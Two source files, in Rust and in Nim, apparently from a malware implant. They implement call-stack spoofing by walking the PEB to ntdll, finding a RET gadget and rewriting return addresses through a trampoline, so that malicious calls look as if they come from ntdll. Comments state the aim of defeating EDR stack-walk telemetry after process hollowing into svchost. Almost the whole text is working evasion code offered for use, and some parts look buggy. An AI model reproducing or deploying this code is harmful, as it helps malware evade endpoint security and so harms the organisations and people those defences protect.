File: src/spoof.rs
//! spoof.rs — Call-stack spoofing via return-address overwrite
//!
//! spoof_stack() walks the current thread's stack frames and replaces
//! any return address that falls within our own PE image with a
//! plausible return address inside a legitimate Windows module
//! (kernel32 or ntdll) to defeat stack-walk-based EDR telemetry.
//!
//! Strategy:
//!   1. Find our own image base via `lea rax, [rip]`.
//!   2. Walk RSP frames up to MAX_FRAMES deep.
//!   3. For each frame whose return addr lands inside our image range,
//!      replace it with a RET gadget inside ntdll's text section.
//!
//! Called once, immediately after hollow_into_svchost returns.

#![allow(dead_code, non_snake_case)]

const MAX_FRAMES: usize = 64;
const OWN_IMAGE_SIZE: usize = 0x80000; // assumed 512 KB ceiling

/// Locate a `ret` byte (0xC3) inside ntdll text as a spoofing gadget.
/// Returns the address of the gadget, or 0 on failure.
unsafe fn find_ret_gadget_in_ntdll() -> usize {
    // Walk PEB Ldr to ntdll (second InMemoryOrder entry after the exe)
    let peb: *const u8;
    core::arch::asm!("mov {p}, gs:[0x60]", p = out(reg) peb);
    let ldr   = *(peb.add(0x18) as *const *const u8);
    let mut e = *(ldr.add(0x10) as *const *const u8);
    e = *(e as *const *const u8);
    let ntdll_base = *(e.add(0x30) as *const *const u8) as *const u8;

    // Parse PE to find .text section bounds
    let pe_off   = *(ntdll_base.add(0x3C) as *const u32) as usize;
    let nt       = ntdll_base.add(pe_off);
    let sec_count = *(nt.add(0x06) as *const u16) as usize;
    // Sections start at NT header + 0x18 (FileHeader.SizeOfOptionalHeader-independent for x64)
    let opt_size  = *(nt.add(0x14) as *const u16) as usize;
    let sec_start = nt.add(0x18 + opt_size);

    for i in 0..sec_count {
        let sec = sec_start.add(i * 0x28);
        // Name is 8 bytes at offset 0; characteristics at offset 0x24
        let chars = *(sec.add(0x24) as *const u32);
        // IMAGE_SCN_MEM_EXECUTE (0x20000000) && IMAGE_SCN_CNT_CODE (0x20)
        if chars & 0x20000000 == 0 { continue; }
        let virt_rva  = *(sec.add(0x0C) as *const u32) as usize;
        let virt_size = *(sec.add(0x08) as *const u32) as usize;
        let start     = ntdll_base.add(virt_rva);
        for off in 0..virt_size {
            if *start.add(off) == 0xC3 {
                return start.add(off) as usize;
            }
        }
    }
    0
}

/// Walk the current stack and overwrite return addresses that point into
/// our own image with a RET gadget inside ntdll.
pub unsafe fn spoof_stack() {
    let own_base: usize;
    core::arch::asm!("lea {b}, [rip]", b = out(reg) own_base);
    let own_base = own_base & !0xFFFF; // align to image base
    let own_end  = own_base + OWN_IMAGE_SIZE;

    let gadget = find_ret_gadget_in_ntdll();
    if gadget == 0 { return; }

    // Read current RSP
    let mut rsp: usize;
    core::arch::asm!("mov {r}, rsp", r = out(reg) rsp);

    for _ in 0..MAX_FRAMES {
        let candidate = *(rsp as *const usize);
        if candidate >= own_base && candidate < own_end {
            *(rsp as *mut usize) = gadget;
        }
        rsp = rsp.wrapping_add(8);
        // Stop if we've walked off into unmapped territory (crude guard)
        if rsp > own_end + 0x100000 { break; }
    }
}

File: src/spoof.nim
# spoof.nim — Return address / call stack spoofing
#
# Trampoline-based stack spoof so that syscall-intensive operations appear to
# originate from a benign call site (e.g. ntdll itself).

var gGadgetAddr*: uint = 0

proc findRetGadget(): uint =
  # unsafe — PEB walk to ntdll, scan .text for 0xC3 RET
  var peb: uint
  {.emit: """__asm__ volatile ("mov %0, qword ptr gs:[0x60]" : "=r"(`peb`));""".}
  let ldr   = cast[ptr uint](peb + 0x18)[]
  var e     = cast[ptr uint](ldr + 0x10)[]
  e = cast[ptr uint](e)[]  # [0] exe
  e = cast[ptr uint](e)[]  # [1] ntdll
  let base  = cast[ptr uint](e + 0x30)[]

  let peOff   = uint(cast[ptr uint32](base + 0x3C)[])
  let nt      = base + peOff
  let numSec  = int(cast[ptr uint16](nt + 0x06)[])
  let optSize = uint(cast[ptr uint16](nt + 0x14)[])
  let secBase = nt + 0x18 + optSize

  for i in 0 ..< numSec:
    let sec      = secBase + uint(i) * 0x28
    let name     = cast[ptr array[8, byte]](sec)
    if name[][0] != byte('.') or name[][1] != byte('t') or
       name[][2] != byte('e') or name[][3] != byte('x') or
       name[][4] != byte('t'):
      continue
    let virtAddr = uint(cast[ptr uint32](sec + 0x0C)[])
    let virtSize = uint(cast[ptr uint32](sec + 0x08)[])
    let textStart = base + virtAddr
    for off in 4 ..< int(virtSize) - 1:
      if cast[ptr byte](textStart + uint(off))[] == 0xC3'u8:
        return textStart + uint(off)
  0

proc initGadget*() =
  # unsafe
  let a = findRetGadget()
  if a != 0:
    gGadgetAddr = a

# Spoof gate — naked function, GCC inline asm
# Calling convention on entry:
#   RSP+0x00 = real return address (pushed by `call spoof_gate`)
#   R10      = target function pointer
#   RCX/RDX/R8/R9 = args 0-3
proc spoofGate() {.asmNoStackFrame.} =
  {.emit: """
    __asm__(
      "mov rax, [rsp]\n\t"
      "lea r11, [rip + `gGadgetAddr`]\n\t"
      "mov r11, [r11]\n\t"
      "mov [rsp], r11\n\t"
      "push rax\n\t"
      "jmp r10\n\t"
    );
  """.}

proc spoofStack*(
  target: pointer,
  arg0, arg1, arg2, arg3: uint,
): int =
  # unsafe
  if gGadgetAddr == 0:
    # Fallback: direct call, no spoof
    let fn = cast[proc(a, b, c, d: uint): int {.stdcall.}](target)
    return fn(arg0, arg1, arg2, arg3)

  var result: int
  {.emit: """
    register NIM_ULONGLONG rcx_val __asm__("rcx") = `arg0`;
    register NIM_ULONGLONG rdx_val __asm__("rdx") = `arg1`;
    register NIM_ULONGLONG r8_val  __asm__("r8")  = `arg2`;
    register NIM_ULONGLONG r9_val  __asm__("r9")  = `arg3`;
    register NIM_ULONGLONG r10_val __asm__("r10") = (NIM_ULONGLONG)`target`;
    __asm__ volatile (
      "call %[gate]"
      : "=a" (`result`)
      : [gate] "r" (`spoofGate`),
        "r" (rcx_val), "r" (rdx_val), "r" (r8_val), "r" (r9_val), "r" (r10_val)
      : "r11", "memory"
    );
  """.}
  result
